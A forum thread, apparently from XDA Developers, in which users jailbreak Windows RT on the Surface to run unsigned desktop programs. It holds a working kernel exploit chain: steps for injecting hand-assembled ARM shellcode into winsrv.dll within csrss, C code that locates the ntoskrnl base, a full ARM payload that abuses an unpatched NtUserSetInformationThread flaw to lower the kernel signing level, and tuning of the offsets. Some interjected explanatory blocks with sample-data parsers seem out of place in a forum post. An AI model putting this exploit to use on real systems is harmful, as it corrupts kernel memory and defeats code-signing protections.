[Q] Hacking Windows RT to Run Desktop Apps?


netham45

Inactive Recognized Developer
Jun 24, 2009
886
569
Denver
CotullaCode (The guy who ported WP7, WP8 and Windows 8 RT on the HTC HD2) managed to compile and run 7Zip on the Surface, I asked him how, here are his answers:

https://twitter.com/CotullaCode/status/287271124222492673
https://twitter.com/CotullaCode/status/287270807179231233

But, what is this LEORT thing? (I'll try to find out myself until someone answers...)

He ported Windows RT to the HTC HD2, also known as the HTC Leo. Since he has full bootloader control he can disable secureboot at will.

It's of no use to us.
 

clrokr

Senior Member
Aug 2, 2009
69
54
Okay you guys, I found a way to change the required signing level. I'm trying to figure out how to automate this so everybody can profit. You basically use VS2012 to edit the last code page of a module that runs in CSRSS's process. Insert some hand-assembled ARM opcodes to trigger the (still not patched) exploit in NtUserSetInformationThread, set a breakpoint somewhere specific and hit it, then modify this instruction pointer PC to point to the hand assembled code. Boom.

As you can see, this is not quite ready for the general public.

I have built a proof of concept that loads ntoskrnl as an image resource and scans through the code segment to find the literal that points to the value we need to change. Using this offset and NtQuerySystemInformation it calculates the linear address of the byte that needs to be zeroed out and fixes the alignment.

Note that using the hand assembled code we can easily trigger the exploit 524288 times which would be impractical otherwise.

You can however set a trace point in VS2012 that displays a message and use the evaluation function to change memory just before NtUserSetInformationThread is called. For example, the last call to NtUserSetInformationThread in TerminalServerRequestThread is perfect for this. It hits every time you press a volume button. I got the signature level down from 8 (the address read 0x00080101) to 7 by pressing a volume button very often.

So, stay prepared.
 

netham45

Inactive Recognized Developer
Jun 24, 2009
886
569
Denver
Okay you guys, I found a way to change the required signing level. I'm trying to figure out how to automate this so everybody can profit. You basically use VS2012 to edit the last code page of a module that runs in CSRSS's process. Insert some hand-assembled ARM opcodes to trigger the (still not patched) exploit in NtUserSetInformationThread, set a breakpoint somewhere specific and hit it, then modify this instruction pointer PC to point to the hand assembled code. Boom.

As you can see, this is not quite ready for the general public.

I have built a proof of concept that loads ntoskrnl as an image resource and scans through the code segment to find the literal that points to the value we need to change. Using this offset and NtQuerySystemInformation it calculates the linear address of the byte that needs to be zeroed out and fixes the alignment.

Note that using the hand assembled code we can easily trigger the exploit 524288 times which would be impractical otherwise.

You can however set a trace point in VS2012 that displays a message and use the evaluation function to change memory just before NtUserSetInformationThread is called. For example, the last call to NtUserSetInformationThread in TerminalServerRequestThread is perfect for this. It hits every time you press a volume button. I got the signature level down from 8 (the address read 0x00080101) to 7 by pressing a volume button very often.

So, stay prepared.

Any chance you could do a (more detailed) writeup of how to do it so we can start on automating it? I'll look at getting authentication going with the remote debugger from a metro app for now.

Edit: I was able to connect to the debugger with authentication disabled, though I'm just replaying the packets right now.
 
Last edited:

clrokr

Senior Member
Aug 2, 2009
69
54
Any chance you could do a (more detailed) writeup of how to do it so we can start on automating it? I'll look at getting authentication going with the remote debugger from a metro app for now.

Reversing the protocol could be hard. I'm thinking about some kind of replay attack. The user would have to run my TIFKAM app that spits out the right address, fire up the Remote Debugger Monitor as administrator and then the app can connect via loopback and play the sequence.
 

netham45

Inactive Recognized Developer
Jun 24, 2009
886
569
Denver
Reversing the protocol could be hard. I'm thinking about some kind of replay attack. The user would have to run my TIFKAM app that spits out the right address, fire up the Remote Debugger Monitor as administrator and then the app can connect via loopback and play the sequence.

That's exactly what I'm looking at right now.

As far as the protocol goes, it actually doesn't seem too hard. I've got it connecting and requesting a task list, which is basically a tab separated spreadsheet (0x01 = tab, 0x02 = new row). It even has labeled headers. Granted, I'm just replaying the connection part.

The only issue about doing a complete replay attack is that things like the PID and such are going to change, we're going to need those.

But, if you could post some more information on what you're doing (as in, how to do it), I could get that going.
 
Last edited:
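The task-list reply described above (0x01 between columns, 0x02 between rows, a labelled header row) is simple enough to parse rather than replay, which also addresses the point that values such as the PID change between sessions. The following is an added example, not code from the thread or from the Remote Debugger Monitor; the column names, PIDs and the exact shape of the sample reply are constructed guesses at the format the post describes, and a real reply may differ.

```cpp
#include <cstdlib>
#include <map>
#include <string>
#include <vector>

// Constructed sample reply: header row, two full rows and one short final
// row with no trailing 0x02. Not captured traffic; the columns are invented.
static const std::string kSampleTaskList =
    "Name\x01PID\x01Session\x02"
    "csrss.exe\x01" "564\x01" "1\x02"
    "explorer.exe\x01" "1820\x01" "1\x02"
    "svchost.exe\x01" "900";   // Session column missing on purpose

struct TaskTable {
    std::vector<std::string> headers;                         // from the first row
    std::vector<std::map<std::string, std::string>> rows;     // column name -> value
};

// Split one row on the 0x01 column separator (empty fields are preserved).
static std::vector<std::string> SplitFields(const std::string& row) {
    std::vector<std::string> out;
    size_t start = 0;
    for (;;) {
        size_t sep = row.find('\x01', start);
        out.push_back(row.substr(start, sep == std::string::npos ? std::string::npos : sep - start));
        if (sep == std::string::npos) return out;
        start = sep + 1;
    }
}

// Parse the whole reply. Rows shorter than the header get empty strings for
// the missing columns; extra fields beyond the header are ignored.
TaskTable ParseTaskList(const std::string& data) {
    TaskTable table;
    bool first = true;
    size_t pos = 0;
    while (pos < data.size()) {
        size_t end = data.find('\x02', pos);
        std::string row = data.substr(pos, end == std::string::npos ? std::string::npos : end - pos);
        pos = (end == std::string::npos) ? data.size() : end + 1;
        if (row.empty()) continue;                 // tolerate doubled separators
        std::vector<std::string> fields = SplitFields(row);
        if (first) { table.headers = fields; first = false; continue; }
        std::map<std::string, std::string> record;
        for (size_t i = 0; i < table.headers.size(); ++i)
            record[table.headers[i]] = i < fields.size() ? fields[i] : std::string();
        table.rows.push_back(record);
    }
    return table;
}

// Look up the PID column for an image name; -1 when absent or not numeric.
long FindPid(const TaskTable& table, const std::string& image) {
    for (const auto& row : table.rows) {
        auto name = row.find("Name");
        if (name == row.end() || name->second != image) continue;
        auto pid = row.find("PID");
        if (pid == row.end() || pid->second.empty()) return -1;
        char* end = nullptr;
        long value = std::strtol(pid->second.c_str(), &end, 10);
        return (*end == '\0') ? value : -1;
    }
    return -1;
}
```

The parser keys each row by the header names, so a consumer asks for `"PID"` by column name instead of by position, which survives the server adding or reordering columns.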

clrokr

Senior Member
Aug 2, 2009
69
54
But, if you could post some more information on what you're doing (as in, how to do it), I could get that going.

I'm working on that. In the meantime, some good news. I managed to run my own desktop program, unsigned and everything. We have to compile the release version because the Surface doesn't come with debug runtime libs for C++.

One thing though: we need to attach to csrss.exe because the exploit depends on it. I don't think this is possible locally because stopping csrss effectively stops the computer (well, the whole Windows subsystem) and we can't send the network packages to continue.
 
  • Like
Reactions: netham45

netham45

Inactive Recognized Developer
Jun 24, 2009
886
569
Denver
I'm working on that. In the meantime, some good news. I managed to run my own desktop program, unsigned and everything. We have to compile the release version because the Surface doesn't come with debug runtime libs for C++.

One thing though: we need to attach to csrss.exe because the exploit depends on it. I don't think this is possible locally because stopping csrss effectively stops the computer (well, the whole Windows subsystem) and we can't send the network packages to continue.

Sign on as a different user to spawn another instance of CSRSS, then attach it from the first user?
 

clrokr

Senior Member
Aug 2, 2009
69
54
Excellent. Any chance you could post the app you're using to get the kernel's base address? Would be very appreciated.
Sorry, no. I don't trust MSFT's compiler, it may include some licensing info in the binaries. But it's really easy, you call NtQuerySystemInformation with information class 11 and make the output buffer really big (like 0x20000). The structure is easily recognizable when viewing the memory.
 

netham45

Inactive Recognized Developer
Jun 24, 2009
886
569
Denver
Sorry, no. I don't trust MSFT's compiler, it may include some licensing info in the binaries. But it's really easy, you call NtQuerySystemInformation with information class 11 and make the output buffer really big (like 0x20000). The structure is easily recognizable when viewing the memory.

Code:
#include <Windows.h>
#include <winternl.h>   // NTSTATUS
#include <cstdio>
#include <cstdlib>
#include <cstring>

#ifndef NT_SUCCESS
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
#endif

// Undocumented layout returned by information class 11 (SystemModuleInformation).
typedef struct _SYSTEM_MODULE {
  ULONG                Reserved1;
  ULONG                Reserved2;
  PVOID                ImageBaseAddress;
  ULONG                ImageSize;
  ULONG                Flags;
  WORD                 Id;
  WORD                 Rank;
  WORD                 w018;
  WORD                 NameOffset;   // offset of the file name inside Name
  BYTE                 Name[255];    // full path, NUL-terminated
} SYSTEM_MODULE, *PSYSTEM_MODULE;

typedef struct _SYSTEM_MODULE_INFORMATION {
  ULONG                ModulesCount;
  SYSTEM_MODULE        Modules[1];   // really ModulesCount entries
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

typedef NTSTATUS (NTAPI *_NtQuerySystemInformation) (
ULONG SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength OPTIONAL
);

BOOL GetKernelBase()
{
	_NtQuerySystemInformation pfnNtQuerySystemInformation;
	PSYSTEM_MODULE_INFORMATION pModuleInfo;
	ULONG i, len = 0;
	NTSTATUS ret;
	HMODULE ntdllHandle;
	BOOL found = FALSE;

	ntdllHandle = GetModuleHandleW(L"ntdll");
	if (!ntdllHandle)
		return FALSE;
	pfnNtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(ntdllHandle, "NtQuerySystemInformation");
	if (!pfnNtQuerySystemInformation)
		return FALSE;

	// First call with no buffer fails (STATUS_INFO_LENGTH_MISMATCH) but reports the size needed.
	pfnNtQuerySystemInformation(11, NULL, 0, &len);
	if (len == 0)
		return FALSE;
	len += 0x1000;   // slack in case a module loads between the two calls
	pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);
	if (!pModuleInfo)
		return FALSE;
	ret = pfnNtQuerySystemInformation(11, pModuleInfo, len, &len);
	if (!NT_SUCCESS(ret))
	{
		printf("[-] NtQuerySystemInformation failed: 0x%08lX\n", (unsigned long)ret);
		GlobalFree(pModuleInfo);
		return FALSE;
	}

	for (i = 0; i < pModuleInfo->ModulesCount; i++)
	{
		if (strcmp((const char*)pModuleInfo->Modules[i].Name, "\\SystemRoot\\system32\\ntoskrnl.exe") == 0)
		{
			printf("[*] Driver Entry: %s at %p\n", pModuleInfo->Modules[i].Name, pModuleInfo->Modules[i].ImageBaseAddress);
			found = TRUE;
		}
	}
	GlobalFree(pModuleInfo);
	return found;
}

int main()
{
	GetKernelBase();
	system("pause");
	return 0;
}

If anyone else needs it.

Edit: Just getting a BSoD with this. Here's what I'm doing:
1) Get kernel base w/ app higher in post
2) Put base in the my_addr field in the source
3) armasm -o exploit.o exploit.asm
4) Taking the code starting at 0x64 (push r5) and putting it in Winsrv.dll!0x10800
5) Placing a breakpoint right after 'bl NtUserSetInformationThread (75475134h)' (Note that there are two calls to NtUserSetInformationThread, I've tried putting the break right after both)
6) Placing a breakpoint at mov r0,r0 at Winsrv.dll!0x10800
7) Resuming CSRSS
8) Hitting vol down
9) Moving PC to Winsrv.dll!0x10800
10) Resume, at this point I BSoD.

I've checked, and it BSoD's on the 'svc 1' line, citing csrss dying.

Here are the registers going into svc 1:
Code:
R0   = FFFFFFFE
R1   = 00000009
R2   = 0117FCA0
R3   = 0000000C
R4   = 00000013
R5   = 0117FCA4
R6   = 00000000
R7   = 00080000
R8   = 8381E000
R9   = 755D1118
R10  = 755D7A50
R11  = 0117FCF8
R12  = 000010E1
SP   = 0117FC38
LR   = 755C3645
PC   = 755D0822
CPSR = 00000030
 
Last edited:
  • Like
Reactions: peterdn
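The posted program only works on Windows, and it matches the full path rather than the file name. As an added example (not code from the thread), the following parses a buffer with the same shape as the class 11 reply on any host: a ULONG count followed by fixed-size records, locating a module by its file name through NameOffset. It assumes the 32-bit record layout (0x11C bytes, pointer-sized fields widened to uint32_t), and the module names, bases and sizes in the sample buffer are constructed values, not read from a real device. It also checks ModulesCount against the buffer length and bounds-checks NameOffset instead of trusting either field.

```cpp
#include <cctype>
#include <cstdint>
#include <cstring>
#include <vector>

// 32-bit layout of one SystemModuleInformation record (assumption: Windows RT
// / x86 layout). Fixed-width fields keep the layout identical on any host.
struct SystemModule32 {
    uint32_t Reserved1;
    uint32_t Reserved2;
    uint32_t ImageBaseAddress;
    uint32_t ImageSize;
    uint32_t Flags;
    uint16_t Id;
    uint16_t Rank;
    uint16_t w018;
    uint16_t NameOffset;    // offset into Name of the file name proper
    uint8_t  Name[255];     // NUL-terminated full path
};
static_assert(sizeof(SystemModule32) == 0x11C, "unexpected record layout");

// Constructed buffer with the reply's shape: uint32 count, then records.
// The paths, bases and sizes below are invented sample values.
std::vector<uint8_t> BuildSampleBuffer() {
    struct Entry { const char* path; uint32_t base; uint32_t size; };
    const Entry entries[] = {
        {"\\SystemRoot\\system32\\ntoskrnl.exe", 0x80000000u, 0x00600000u},
        {"\\SystemRoot\\system32\\hal.dll",      0x80600000u, 0x00040000u},
    };
    std::vector<uint8_t> buf(sizeof(uint32_t));
    uint32_t count = 2;
    std::memcpy(buf.data(), &count, sizeof count);
    for (const Entry& e : entries) {
        SystemModule32 m{};
        m.ImageBaseAddress = e.base;
        m.ImageSize = e.size;
        std::strncpy(reinterpret_cast<char*>(m.Name), e.path, sizeof m.Name - 1);
        const char* slash = std::strrchr(e.path, '\\');
        m.NameOffset = static_cast<uint16_t>(slash ? (slash - e.path) + 1 : 0);
        const uint8_t* p = reinterpret_cast<const uint8_t*>(&m);
        buf.insert(buf.end(), p, p + sizeof m);
    }
    return buf;
}

// Case-insensitive comparison, since module names are not case-normalised.
static bool IEquals(const char* a, const char* b) {
    for (; *a && *b; ++a, ++b)
        if (std::tolower((unsigned char)*a) != std::tolower((unsigned char)*b)) return false;
    return *a == *b;
}

// Returns the image base of the module whose file name matches, or 0 when it
// is not present. ModulesCount is clamped to what the buffer actually holds
// (a truncated reply must not cause an over-read) and NameOffset is
// bounds-checked before it is dereferenced.
uint32_t FindModuleBase(const std::vector<uint8_t>& buf, const char* basename) {
    if (buf.size() < sizeof(uint32_t)) return 0;
    uint32_t count;
    std::memcpy(&count, buf.data(), sizeof count);
    size_t available = (buf.size() - sizeof(uint32_t)) / sizeof(SystemModule32);
    if (count > available) count = static_cast<uint32_t>(available);
    for (uint32_t i = 0; i < count; ++i) {
        SystemModule32 m;
        std::memcpy(&m, buf.data() + sizeof(uint32_t) + i * sizeof m, sizeof m);
        m.Name[sizeof m.Name - 1] = 0;                 // force termination
        if (m.NameOffset >= sizeof m.Name) continue;   // corrupt record
        if (IEquals(reinterpret_cast<const char*>(m.Name) + m.NameOffset, basename))
            return m.ImageBaseAddress;
    }
    return 0;
}
```

On a real system the buffer would come from the NtQuerySystemInformation call in the post above; the lookup logic is the same, and matching on NameOffset rather than the full path tolerates the kernel being reported under a different path or casing.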

peterdn

Member
Sep 19, 2010
36
11
Oxford
Looking great guys!

1) Get kernel base w/ app higher in post
2) Put base in the my_addr field in the source

Fyi, I believe that my_addr should actually contain the address of the word we want to modify, i.e. in this case nt+0x19ffa4.

Otherwise I ran through those steps exactly and I'm getting the 0x18 REFERENCE_BY_POINTER bugcheck as described at the end of clrokr's blog post.

For every dump I have, address nt+0x19ffa4 contains the value 0x00080101. Does that look like what you guys have?
 

clrokr

Senior Member
Aug 2, 2009
69
54
@netham45:
You need to add 0x18 to the address you supply in your step 2), because ObfDereferenceObject subtracts 0x18 from it, so it changes the wrong address in your case. I updated the article accordingly.
@peterdn:
0x00080101 looks right and is the reason we can do this without a bluescreen.
 
Last edited:

peterdn

Member
Sep 19, 2010
36
11
Oxford
@netham45:
You need to add 0x18 to the address you supply in your step 2), because ObfDereferenceObject subtracts 0x18 from it, so it changes the wrong address in your case. I updated the article accordingly.

Oops, I forgot to add the 0x18 as well.

Will have another go in a few minutes.

EDIT: works beautifully :)
 
Last edited:

peterdn

Member
Sep 19, 2010
36
11
Oxford
Utterly fantastic. Managed to compile PuTTY with not much trouble and it runs perfectly!

(screenshot: lWKjp.png)
 

netham45

Inactive Recognized Developer
Jun 24, 2009
886
569
Denver
I just tried a simple pure .net program (Form with a label on it) and the same .exe works on both my desktop and my tablet. I can't believe MS locked this out.

Edit: Oddly enough, running from a metro app has debug dlls, while running from desktop doesn't.
 
Last edited:

clrokr

Senior Member
Aug 2, 2009
69
54
Utterly fantastic. Managed to compile PuTTY with not much trouble and it runs perfectly!

Awesome! Try out more open source stuff, I know I will.

I just tried a simple pure .net program (Form with a label on it) and the same .exe works on both my desktop and my tablet. I can't believe MS locked this out.

I really don't get how the people on Reddit are so against having desktop apps on their devices. It works flawlessly. Probably a bad case of Reddit Reverse Psychology :)

It honestly just feels like my Surface's value has magically increased by $300.
 
  • Like
Reactions: Griffinx

netham45

Inactive Recognized Developer
Jun 24, 2009
886
569
Denver
I seem to be missing a number of libs required for things like putty and the such, any clues on where they are?

Code:
7>sizetip.obj : error LNK2019: unresolved external symbol __imp_DeleteDC referenced in function SizeTipWndProc
7>window.obj : error LNK2001: unresolved external symbol __imp_DeleteDC
7>sizetip.obj : error LNK2019: unresolved external symbol __imp_GetTextExtentPoint32A referenced in function SizeTipWndProc
7>winctrls.obj : error LNK2001: unresolved external symbol __imp_GetTextExtentPoint32A
7>sizetip.obj : error LNK2019: unresolved external symbol __imp_SelectObject referenced in function SizeTipWndProc
7>winctrls.obj : error LNK2001: unresolved external symbol __imp_SelectObject
7>window.obj : error LNK2001: unresolved external symbol __imp_SelectObject
7>sizetip.obj : error LNK2019: unresolved external symbol __imp_CreateCompatibleDC referenced in function SizeTipWndProc
7>window.obj : error LNK2001: unresolved external symbol __imp_CreateCompatibleDC
7>sizetip.obj : error LNK2019: unresolved external symbol __imp_DeleteObject referenced in function SizeTipWndProc
7>winctrls.obj : error LNK2001: unresolved external symbol __imp_DeleteObject
7>window.obj : error LNK2001: unresolved external symbol __imp_DeleteObject
7>sizetip.obj : error LNK2019: unresolved external symbol __imp_TextOutA referenced in function SizeTipWndProc
7>winctrls.obj : error LNK2001: unresolved external symbol __imp_TextOutA
7>sizetip.obj : error LNK2019: unresolved external symbol __imp_SetBkColor referenced in function SizeTipWndProc
7>window.obj : error LNK2001: unresolved external symbol __imp_SetBkColor
7>sizetip.obj : error LNK2019: unresolved external symbol __imp_SetTextColor referenced in function SizeTipWndProc
7>window.obj : error LNK2001: unresolved external symbol __imp_SetTextColor
7>sizetip.obj : error LNK2019: unresolved external symbol __imp_Rectangle referenced in function SizeTipWndProc
7>window.obj : error LNK2001: unresolved external symbol __imp_Rectangle
7>sizetip.obj : error LNK2019: unresolved external symbol __imp_CreateSolidBrush referenced in function SizeTipWndProc
7>window.obj : error LNK2001: unresolved external symbol __imp_CreateSolidBrush
7>sizetip.obj : error LNK2019: unresolved external symbol __imp_GetStockObject referenced in function SizeTipWndProc
7>window.obj : error LNK2001: unresolved external symbol __imp_GetStockObject
7>sizetip.obj : error LNK2019: unresolved external symbol __imp_CreateFontIndirectA referenced in function UpdateSizeTip
7>winctrls.obj : error LNK2019: unresolved external symbol __imp_SetMapMode referenced in function staticwrap
7>winctrls.obj : error LNK2019: unresolved external symbol __imp_GetDeviceCaps referenced in function staticwrap
7>window.obj : error LNK2001: unresolved external symbol __imp_GetDeviceCaps
7>winctrls.obj : error LNK2019: unresolved external symbol __imp_GetTextExtentExPointA referenced in function staticwrap
7>winctrls.obj : error LNK2019: unresolved external symbol __imp_LBItemFromPt referenced in function pl_itemfrompt
7>winctrls.obj : error LNK2019: unresolved external symbol __imp_CreateFontA referenced in function dlg_auto_set_fixed_pitch_flag
7>window.obj : error LNK2001: unresolved external symbol __imp_CreateFontA
7>winctrls.obj : error LNK2019: unresolved external symbol __imp_GetTextMetricsA referenced in function dlg_auto_set_fixed_pitch_flag
7>window.obj : error LNK2001: unresolved external symbol __imp_GetTextMetricsA
7>winctrls.obj : error LNK2019: unresolved external symbol __imp_MakeDragList referenced in function prefslist
7>winctrls.obj : error LNK2019: unresolved external symbol __imp_DrawInsert referenced in function handle_prefslist
7>winctrls.obj : error LNK2019: unresolved external symbol __imp_ChooseFontA referenced in function winctrl_handle_command
7>winctrls.obj : error LNK2019: unresolved external symbol __imp_ChooseColorA referenced in function winctrl_handle_command
7>windlg.obj : error LNK2019: unresolved external symbol __imp_ShellExecuteA referenced in function AboutProc
7>window.obj : error LNK2019: unresolved external symbol __imp_CreatePalette referenced in function init_palette
7>window.obj : error LNK2019: unresolved external symbol __imp_SelectPalette referenced in function init_palette
7>window.obj : error LNK2019: unresolved external symbol __imp_RealizePalette referenced in function init_palette
7>window.obj : error LNK2019: unresolved external symbol __imp_GetCharacterPlacementW referenced in function exact_textout
7>window.obj : error LNK2019: unresolved external symbol __imp_ExtTextOutA referenced in function exact_textout
7>window.obj : error LNK2019: unresolved external symbol __imp_GetCharABCWidthsFloatA referenced in function get_font_width
7>window.obj : error LNK2019: unresolved external symbol ImmGetContext referenced in function sys_cursor_update
7>window.obj : error LNK2019: unresolved external symbol ImmSetCompositionWindow referenced in function sys_cursor_update
7>window.obj : error LNK2019: unresolved external symbol ImmReleaseContext referenced in function sys_cursor_update
7>window.obj : error LNK2019: unresolved external symbol __imp_SetPaletteEntries referenced in function real_palette_set
7>window.obj : error LNK2019: unresolved external symbol __imp_ExtTextOutW referenced in function general_textout
7>window.obj : error LNK2019: unresolved external symbol __imp_SetBkMode referenced in function general_textout
7>window.obj : error LNK2019: unresolved external symbol __imp_GetBkMode referenced in function general_textout
7>window.obj : error LNK2019: unresolved external symbol __imp_GetObjectA referenced in function init_fonts
7>window.obj : error LNK2019: unresolved external symbol __imp_TranslateCharsetInfo referenced in function init_fonts
7>window.obj : error LNK2019: unresolved external symbol __imp_SetTextAlign referenced in function init_fonts
7>window.obj : error LNK2019: unresolved external symbol __imp_CreateCompatibleBitmap referenced in function init_fonts
7>window.obj : error LNK2019: unresolved external symbol __imp_GetPixel referenced in function init_fonts
7>window.obj : error LNK2019: unresolved external symbol __imp_GetCharWidth32A referenced in function char_width
7>window.obj : error LNK2019: unresolved external symbol __imp_GetCharWidthA referenced in function char_width
7>window.obj : error LNK2019: unresolved external symbol __imp_GetCharWidth32W referenced in function char_width
7>window.obj : error LNK2019: unresolved external symbol __imp_GetCharWidthW referenced in function char_width
7>window.obj : error LNK2019: unresolved external symbol __imp_CoUninitialize referenced in function cleanup_exit
7>window.obj : error LNK2019: unresolved external symbol __imp_UnrealizeObject referenced in function palette_set
7>window.obj : error LNK2019: unresolved external symbol __imp_GetClipBox referenced in function xEnumDisplayMonitors
7>window.obj : error LNK2019: unresolved external symbol __imp_GetDCOrgEx referenced in function xEnumDisplayMonitors
7>window.obj : error LNK2019: unresolved external symbol __imp_LineTo referenced in function do_text_internal
7>window.obj : error LNK2019: unresolved external symbol __imp_MoveToEx referenced in function do_text_internal
7>window.obj : error LNK2019: unresolved external symbol __imp_CreatePen referenced in function do_text_internal
7>window.obj : error LNK2019: unresolved external symbol __imp_PlaySoundA referenced in function do_beep
7>window.obj : error LNK2019: unresolved external symbol __imp_Polyline referenced in function do_cursor
7>window.obj : error LNK2019: unresolved external symbol __imp_SetPixel referenced in function do_cursor
7>window.obj : error LNK2019: unresolved external symbol __imp_ExcludeClipRect referenced in function WndProc
7>window.obj : error LNK2019: unresolved external symbol __imp_IntersectClipRect referenced in function WndProc
7>window.obj : error LNK2019: unresolved external symbol __imp_UpdateColors referenced in function WndProc
7>window.obj : error LNK2019: unresolved external symbol ImmSetCompositionFontA referenced in function WndProc
7>window.obj : error LNK2019: unresolved external symbol ImmGetCompositionStringW referenced in function WndProc
7>window.obj : error LNK2019: unresolved external symbol __imp_InitCommonControls referenced in function WinMain
7>window.obj : error LNK2019: unresolved external symbol __imp_CoInitialize referenced in function WinMain
7>window.obj : error LNK2019: unresolved external symbol __imp_CreateBitmap referenced in function WinMain
7>winjump.obj : error LNK2019: unresolved external symbol __imp_CoCreateInstance referenced in function make_shell_link
7>winmisc.obj : error LNK2019: unresolved external symbol __imp_GetUserNameA referenced in function get_username
7>winprint.obj : error LNK2019: unresolved external symbol EnumPrintersA referenced in function printer_add_enum
7>winprint.obj : error LNK2019: unresolved external symbol OpenPrinterA referenced in function printer_start_job
7>winprint.obj : error LNK2019: unresolved external symbol StartDocPrinterA referenced in function printer_start_job
7>winprint.obj : error LNK2019: unresolved external symbol StartPagePrinter referenced in function printer_start_job
7>winprint.obj : error LNK2019: unresolved external symbol EndDocPrinter referenced in function printer_start_job
7>winprint.obj : error LNK2019: unresolved external symbol ClosePrinter referenced in function printer_start_job
7>winprint.obj : error LNK2019: unresolved external symbol WritePrinter referenced in function printer_job_data
7>winprint.obj : error LNK2019: unresolved external symbol EndPagePrinter referenced in function printer_finish_job
7>winstore.obj : error LNK2019: unresolved external symbol __imp_RegSetValueExA referenced in function write_setting_s
7>winstore.obj : error LNK2019: unresolved external symbol __imp_RegCloseKey referenced in function close_settings_w
7>winstore.obj : error LNK2019: unresolved external symbol __imp_RegQueryValueExA referenced in function read_setting_s
7>winstore.obj : error LNK2019: unresolved external symbol __imp_RegOpenKeyA referenced in function enum_settings_start
7>winstore.obj : error LNK2019: unresolved external symbol __imp_RegEnumKeyA referenced in function registry_recursive_remove
7>winstore.obj : error LNK2019: unresolved external symbol __imp_RegDeleteKeyA referenced in function registry_recursive_remove
7>winstore.obj : error LNK2019: unresolved external symbol __imp_RegCreateKeyA referenced in function open_settings_w
7>winstore.obj : error LNK2019: unresolved external symbol __imp_RegCreateKeyExA referenced in function transform_jumplist_registry
7>winstore.obj : error LNK2019: unresolved external symbol __imp_RegDeleteValueA referenced in function transform_jumplist_registry
7>winutils.obj : error LNK2019: unresolved external symbol __imp_GetSaveFileNameA referenced in function request_file
7>winutils.obj : error LNK2019: unresolved external symbol __imp_GetOpenFileNameA referenced in function request_file

I've only spent a few minutes looking at it, though, I've got to go pretty soon.
 

Top Liked Posts

  • 17
    This would be fantastic.

    Other than one bug I just tracked down I've got everything except getting the kernel base automated in a batch file + debugger.

    Edit: Here's what I've got so far. To use:

    1) Install the app in the top of THIS thread (Sorry, you'll have to compile it for now, I'm working on a clean app I can package, but it's not ready yet)
    2) Copy the 'getKernelBase.exe' from the ZIP attached to this post to the folder it installs to (%userprofile%\appxlayouts\<appname>)
    3) Run the app, click the button
    4) Click OK on the prompt, type 'getKernelBase' into the command prompt. If it doesn't do anything, snap the app to the side of your screen.
    5) Keep the 4 numbers it gives you
    6) Open 'runExploit.bat' as an administrator
    7) Put those 4 numbers in there, make sure you keep the spaces between them
    8) Press enter
    9) Press Volume Down
    10) Press enter again
    11) You should be jailbroken now.

    And a writeup for what I'm doing for my hack:
    It's mainly the same basic hack as clrokr, but I found a way that I could write process memory using cdb (but, I can't attach as a debugger, so I lose breakpoints)

    I change winsrv.dll+0x3644 to redirect to winsrv.dll+0x10800

    I inject this modified payload at winsrv.dll+0x10800:
    Code:
    	push {r5-r8}
    	mov r7, 0x80000
    	ldr r8, my_addr
    loc_loop_begin
    	movs r3, 0xC
    	add r2, sp, 0x68 ;0x58 org.
    	add r5, r2, 4
    	str r8, [r5]
    	movs r1, 9
    	mvn r0, 1
    	mov r12, 0x10E1
    	svc 1
    	subs r7, r7, 1
    	cmp r7, 0
    	bne loc_loop_begin
    	pop {r5-r8}
    	mov r7, r0
    endloop
    	cmp r7,#0
    	b endloop
    	b -0xD1E6
    my_addr dcd 0x<Kernel Base>
    	end

    That then gets called when you press vol down. It hangs at the loop at the end so it doesn't execute the exploit twice (which would crash the tablet)

    I then reset winsrv.dll+0x3644 back to default
    Once it's default, I zero out 'b endloop', allowing it to progress to the b -0xD1E6 and resume execution

    cdb -pvr <pid> attaches to <pid> in non-invasive mode, which grants the ability to see loaded modules and change ram but not debug (pause, resume, break, manage breakpoints, get debug events), since there's no debugger actually attaching. That's why it works on the ARM too.

    And that's it.


    Edit: I missed something, it's not working in the zip. I'll check it real fast.
    More edit: I see what I did, fix in a couple minutes.
    Even more edit: Should be fixed, the offset I had at the bottom of the payload was off by 0x6.
    Super edit: Nope, something is still up. It works perfectly if the debugger is attached to csrss, but if not it crashes. =/
    Super-duper edit: seems to work intermittently, I'm not 100% sure why it crashes some of the time, though.
    Mega Edit: One of the offsets I'm using changes randomly between a few different possibilities, I'll see if I can come up with some way to generate the code for it.
    9
    I just got the exploit running using only on-tablet programs, I should be able to bundle it into a nice little app where you just have to click one or two things.
    9
    Got Mouse Without Borders (MS-Made Synergy-ish app) working.
    Simple guide:
    Install it on desktop
    Copy the folder out of the program files to the tablet
    Open admin command prompt on tablet
    run sc create MouseWithoutBorders binpath="c:\Path\To\MouseWithoutBordersSvc.exe" (Fix the path)
    Open services.msc, start the service you just created
    It'll then prompt to set it up.
    7
    Pardon if I misunderstood, but why *not* decrement it oh, 0x7FFF0 times? That way, if it was 0x80101, it will now be 0x00110 (which is maybe not ideal, but depending on what those other bytes represent it might still work) and if it was 0x80000, it will now be 0x0000F (which again may be less than ideal, but won't be the fully zeroed-out value).

    Working on that exact thing right now. Should have a result momentarily.

    Edit: Seems to have worked, at least for the initial test. If all goes well, I should be able to get a 100% exploit rate.

    Edit 2: 3 for 4 so far, with the one that failed being because the offset was off.

    Edit 3: Still getting a crash. Going to try 0x7EFF0 instead of 0x7FFF0.

    Edit 4: Seem to at least be getting a higher success rate with this method.

    Edit 5: Hopefully not jumping the gun, but I seem to have gotten it except in the occasions where the offset is not what I've preprogrammed. I think I've got a means to fix it when the offset is wrong, but I haven't actually managed to get a debugger attached recently when it was wrong.

    Edits are fun: I've tried it 7 times now, all worked. I've never had that success rate with it before, I'm going to call this one fixed.

    More edit: It's odd, it only seems to give the SYSTEM_SERVICE_EXCEPTION when I don't have a debugger attached. Guess I get to go dig through a memory dump. Does it make sense that the debugger would be shifting everything down (0x....3646 -> 0x....3644) just by having a debugger on?

    Edit 8: I can say with 75% certainty that I've fixed the 0x18 bugcheck.

    Edit 9: I think the bug might be caused because the debuggers I'm using in the script don't have the PDB loaded for winsrv.dll, I'm going to give it the PDB and see what it does.

    Edit 10: I've found out that the crash happens reliably if the exploit is run within a few seconds of the system booting, it seems to work best if you wait at least a minute after logging in before running it.

